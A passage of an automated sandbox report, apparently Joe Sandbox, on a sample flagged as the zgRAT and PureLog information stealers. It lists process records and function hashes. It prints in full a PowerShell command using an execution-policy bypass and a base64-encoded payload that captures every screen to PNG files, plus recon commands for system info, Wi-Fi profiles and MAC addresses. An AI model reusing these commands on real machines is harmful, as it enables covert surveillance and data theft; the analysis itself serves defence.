Start date:	01/08/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "tree /A /F"
Imagebase:	0x7ff6e1210000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	64
Start time:	04:57:37
Start date:	01/08/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	65
Start time:	04:57:37
Start date:	01/08/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	66
Start time:	04:57:37
Start date:	01/08/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	67
Start time:	04:57:37
Start date:	01/08/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	68
Start time:	04:57:37
Start date:	01/08/2024
Path:	C:\Windows\System32\tree.com
Wow64 process (32bit):	false
Commandline:	tree /A /F
Imagebase:	0x7ff750d20000
File size:	20'992 bytes
MD5 hash:	9EB969EF56718A6243BF60350CD065F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	69
Start time:	04:57:37
Start date:	01/08/2024
Path:	C:\Windows\System32\systeminfo.exe
Wow64 process (32bit):	false
Commandline:	systeminfo
Imagebase:	0x7ff7946c0000
File size:	110'080 bytes
MD5 hash:	EE309A9C61511E907D87B10EF226FDCD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	70
Start time:	04:57:37
Start date:	01/08/2024
Path:	C:\Windows\System32\netsh.exe
Wow64 process (32bit):	false
Commandline:	netsh wlan show profile
Imagebase:	0x7ff7b2a20000
File size:	96'768 bytes
MD5 hash:	6F1E6DD688818BC3D1391D0CC7D597EB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	71
Start time:	04:57:38
Start date:	01/08/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	75
Start time:	04:57:38
Start date:	01/08/2024
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\rbycypt0\rbycypt0.cmdline"
Imagebase:	0x7ff793cf0000
File size:	2'759'232 bytes
MD5 hash:	F65B029562077B648A6A5F6A1AA76A66
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	76
Start time:	04:57:38
Start date:	01/08/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	77
Start time:	04:57:39
Start date:	01/08/2024
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5269.tmp" "c:\Windows\System32\CSCCC22D6FAD44545049E46F17EB7F694E7.TMP"
Imagebase:	0x7ff65ba90000
File size:	52'744 bytes
MD5 hash:	C877CBB966EA5939AA2A17B6A5160950
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	78
Start time:	04:57:39
Start date:	01/08/2024
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\r1ffbxq0\r1ffbxq0.cmdline"
Imagebase:	0x7ff793cf0000
File size:	2'759'232 bytes
MD5 hash:	F65B029562077B648A6A5F6A1AA76A66
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	79
Start time:	04:57:40
Start date:	01/08/2024
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5528.tmp" "c:\Users\user\AppData\Local\Temp\r1ffbxq0\CSCD4520F5E8E664C3288A2F8DB92B7943B.TMP"
Imagebase:	0x7ff65ba90000
File size:	52'744 bytes
MD5 hash:	C877CBB966EA5939AA2A17B6A5160950
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	80
Start time:	04:57:40
Start date:	01/08/2024
Path:	C:\Users\user\cscript.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\cscript.exe
Imagebase:	0x620000
File size:	3'720'704 bytes
MD5 hash:	5FE249BBCC644C6F155D86E8B3CC1E12
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\user\cscript.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\cscript.exe, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	81
Start time:	04:57:41
Start date:	01/08/2024
Path:	C:\Users\user\cscript.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\cscript.exe
Imagebase:	0x590000
File size:	3'720'704 bytes
MD5 hash:	5FE249BBCC644C6F155D86E8B3CC1E12
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	82
Start time:	04:57:41
Start date:	01/08/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "tree /A /F"
Imagebase:	0x7ff6e1210000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	83
Start time:	04:57:41
Start date:	01/08/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	85
Start time:	04:57:41
Start date:	01/08/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "getmac"
Imagebase:	0x7ff6e1210000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	86
Start time:	04:57:41
Start date:	01/08/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	88
Start time:	04:57:41
Start date:	01/08/2024
Path:	C:\Windows\System32\tree.com
Wow64 process (32bit):	false
Commandline:	tree /A /F
Imagebase:	0x7ff750d20000
File size:	20'992 bytes
MD5 hash:	9EB969EF56718A6243BF60350CD065F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	112
Start time:	04:57:42
Start date:	01/08/2024
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Function 00007FFD9B9708A5 Relevance: .4, Instructions: 387COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2689254102.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd9b970000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 37cbd37ab7ba30f8d3f94edd3cc9d453adb40fd08cd196ee33b42f1ae426a0f2
Instruction ID: 2c8b1e84f9eb22076978832d356e0abcece317f266f334347a4816db192fe3bd
Opcode Fuzzy Hash: 37cbd37ab7ba30f8d3f94edd3cc9d453adb40fd08cd196ee33b42f1ae426a0f2
Instruction Fuzzy Hash: 4BC12732B1EA4D5FEBA8DB6898A46B477D1FF98714F1901BED44DC32A2DE25AC01C740

Function 00007FFD9B8A33B5 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2669181632.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd9b8a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7e3f66ddd574c0af08e81a6a1c9bf0a66f23b8602905d0de1fbc826de9b6d032
Instruction ID: 2d8e5c199f5335979778887b622e34919a8febb75adba4d6537578fae4bb4e89
Opcode Fuzzy Hash: 7e3f66ddd574c0af08e81a6a1c9bf0a66f23b8602905d0de1fbc826de9b6d032
Instruction Fuzzy Hash: 8601677121CB0D4FD748EF0CE451AA6B7E0FB99364F10056DE58AC36A5DA36E882CB45

Analysis Process: powershell.exePID: 6232, Parent PID: 6912COMMON

Executed Functions

Function 00007FFD9B97664C Relevance: .4, Instructions: 401COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2849376344.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd9b970000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 019de5bb1e77f0a0a50a49622d7e2a319a0c71e9c8f2cbe03c0bf3639a387d68
Instruction ID: becc08a0691e2c429a8eafaac2e537da8cb1a89897578c7a9c65fbc108207fd4
Opcode Fuzzy Hash: 019de5bb1e77f0a0a50a49622d7e2a319a0c71e9c8f2cbe03c0bf3639a387d68
Instruction Fuzzy Hash: 2EC15832B1EA8D5FEBA4EBA848A55B57BE1EF55310F0901FED45CC70E7D918A9018341

Function 00007FFD9B8AA908 Relevance: .2, Instructions: 224COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2838917134.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd9b8a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7644c28739e31176675778a6c06605b630804a1a1a7635ef59980513586a68f2
Instruction ID: ea8ef1c203c32e03783ccc5916dd621f0efda988e937b66219651f9556e4c652
Opcode Fuzzy Hash: 7644c28739e31176675778a6c06605b630804a1a1a7635ef59980513586a68f2
Instruction Fuzzy Hash: 24519C3160EB8A5FE319DB28C8A58647BE0FF56314B1802BEC0D9C75A3ED25B847C751

Function 00007FFD9B8A9858 Relevance: .1, Instructions: 131COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2838917134.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd9b8a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c2d7ebd6542cfe8aa3c27a3bf09e0e3d8dcf1be9b74217d06d2e538f2b871788
Instruction ID: cb8287a62b6f60742b4898cb2037484a0ff83743f6476a00d913aaea6774fe45
Opcode Fuzzy Hash: c2d7ebd6542cfe8aa3c27a3bf09e0e3d8dcf1be9b74217d06d2e538f2b871788
Instruction Fuzzy Hash: 1C31E971A1DB4C9FDB5C9B5CA84A6E9BBE0FB99710F00412FE449C3252DB20A955CBC2

Function 00007FFD9B78E620 Relevance: .1, Instructions: 125COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2822445802.00007FFD9B78D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B78D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd9b78d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c267055943c2ed54b5f28122be65291514b9bea7346db8252816412689e106f
Instruction ID: 47f1f291705a276a3c6a56a9aeaf3059a4a0f30289e7f27d07fc8d76c29976e6
Opcode Fuzzy Hash: 6c267055943c2ed54b5f28122be65291514b9bea7346db8252816412689e106f
Instruction Fuzzy Hash: 5141257150EBC44FE7569B28D8559523FF0EF52321B1906DFD088CB1B3D725A846C792

Function 00007FFD9B8AA81C Relevance: .1, Instructions: 115COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2838917134.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd9b8a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 18fa99c3be3da498b30cb8c32c9d2a0d2a1aadac0d16dfd07bfa4f49e884f64d
Instruction ID: de342aa6ad75306128ea2ffa1f42594d41261f5a7a7e31c16672f852f1c99059
Opcode Fuzzy Hash: 18fa99c3be3da498b30cb8c32c9d2a0d2a1aadac0d16dfd07bfa4f49e884f64d
Instruction Fuzzy Hash: 3331F73190DB8C4FDB59DBA898596E97FE0EF66320F0441AFD049C7163D678580ACB52

Function 00007FFD9B8AA1C4 Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2838917134.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd9b8a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5f36abceedb2ff7a5a4107e1baa7ee65573aa8b99880c3efb38f262d1595353a
Instruction ID: d7bf8f3c6d35c24e9dab6177481c03bd42b0d2a39a20293235fd619efd113965
Opcode Fuzzy Hash: 5f36abceedb2ff7a5a4107e1baa7ee65573aa8b99880c3efb38f262d1595353a
Instruction Fuzzy Hash: 36214B7290FACD7FD721CF648C650A83FA0FF25604F0911FBC4998B463EE2825458B92

Function 00007FFD9B8A33B5 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2838917134.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd9b8a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7e3f66ddd574c0af08e81a6a1c9bf0a66f23b8602905d0de1fbc826de9b6d032
Instruction ID: 2d8e5c199f5335979778887b622e34919a8febb75adba4d6537578fae4bb4e89
Opcode Fuzzy Hash: 7e3f66ddd574c0af08e81a6a1c9bf0a66f23b8602905d0de1fbc826de9b6d032
Instruction Fuzzy Hash: 8601677121CB0D4FD748EF0CE451AA6B7E0FB99364F10056DE58AC36A5DA36E882CB45

Function 00007FFD9B97414D Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2849376344.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd9b970000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9820f546ee2de6db86a8ddf4ffe6efc22c75cd3d422e35d6bf3d3a0799e4b71f
Instruction ID: dc66fbef532d3b88a886fb64ea44960147d7784db491956fd33d890d7adf18b0
Opcode Fuzzy Hash: 9820f546ee2de6db86a8ddf4ffe6efc22c75cd3d422e35d6bf3d3a0799e4b71f
Instruction Fuzzy Hash: 50F0BE32B1E5098FD768EA5CE4919A873E0EF65330B1640BAE06DC76B3CA25EC40C745

Function 00007FFD9B974400 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2849376344.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd9b970000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6f4bc8122bacbae6aa44f78e3df031e92895dd5e75308ff5043c188297f90a1
Instruction ID: 329026db852129f88535cebd800922a2752c862269b39035a986aaa27a932cf3
Opcode Fuzzy Hash: d6f4bc8122bacbae6aa44f78e3df031e92895dd5e75308ff5043c188297f90a1
Instruction Fuzzy Hash: 75F0BE32B0E5498FD764EA5CE4A09A873E0EF05320B1600BAE05DCB1B3CA25AC40C750

Function 00007FFD9B9741D1 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2849376344.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd9b970000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
Instruction ID: 664ee9e526855705bcffdcfcbd412457206555aceccb5f816b9e306c4c7c1cf4
Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
Instruction Fuzzy Hash: 43E0123171C4089FD678EA4CE0919AD73E5EBA833171241BBD14EC7672CA21ED518B85

Non-executed Functions

Function 00007FFD9B8A8BFA Relevance: 6.3, Strings: 5, Instructions: 91COMMON

Download Yara Rule

Strings

L_^F, xrefs: 00007FFD9B8A8C72
L_^8, xrefs: 00007FFD9B8A8C12
L_^K, xrefs: 00007FFD9B8A8C8A
L_^5, xrefs: 00007FFD9B8A8BFA
L_^I, xrefs: 00007FFD9B8A8C7A

Memory Dump Source

Source File: 00000003.00000002.2838917134.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd9b8a0000_powershell.jbxd

Similarity

API ID:
String ID: L_^5$L_^8$L_^F$L_^I$L_^K
API String ID: 0-3847582561
Opcode ID: 91bfba94832802edee52879ad1a49d538ed21ee38dc412c56f7241ee861ed7f9
Instruction ID: c570d076eeb12835a518e1baf60f5fb762b48af022766ff4ca14cc2482e8c46f
Opcode Fuzzy Hash: 91bfba94832802edee52879ad1a49d538ed21ee38dc412c56f7241ee861ed7f9
Instruction Fuzzy Hash: 6621F5B77141258AD306776DBC159ED7784CF8427934992F3D2A88F553EE14608B8A90

Function 00007FFD9B8A89F3 Relevance: 5.1, Strings: 4, Instructions: 120COMMON

Download Yara Rule

Strings

L_^, xrefs: 00007FFD9B8A8A62
L_^, xrefs: 00007FFD9B8A8AC9
L_^, xrefs: 00007FFD9B8A8A12
L_^, xrefs: 00007FFD9B8A8A22

Memory Dump Source

Source File: 00000003.00000002.2838917134.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd9b8a0000_powershell.jbxd

Similarity

API ID:
String ID: L_^$L_^$L_^$L_^
API String ID: 0-2357752022
Opcode ID: 43278445ab522ed42d22f5ba2f0dffc5591d620afab75b1d2773fd866f3d6f24
Instruction ID: aa9dd02fbd065fbaf5b40ec80b5cb2d05dbe05e3ea14e389f1afadefcdce9de6
Opcode Fuzzy Hash: 43278445ab522ed42d22f5ba2f0dffc5591d620afab75b1d2773fd866f3d6f24
Instruction Fuzzy Hash: 9B3116A3B0FAC61FE366476A48B50986BA0FF6675875E13F2C1D40F0A3ED14394746A3

Analysis Process: RuntimeBroker.exePID: 6864, Parent PID: 6912COMMON

Execution Graph

Execution Coverage:	9.5%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	19.3%
Total number of Nodes:	2000
Total number of Limit Nodes:	22

Executed Functions

Function 00007FF72B051000 Relevance: 40.6, APIs: 5, Strings: 18, Instructions: 338
COMMON

Download Yara Rule

Control-flow Graph

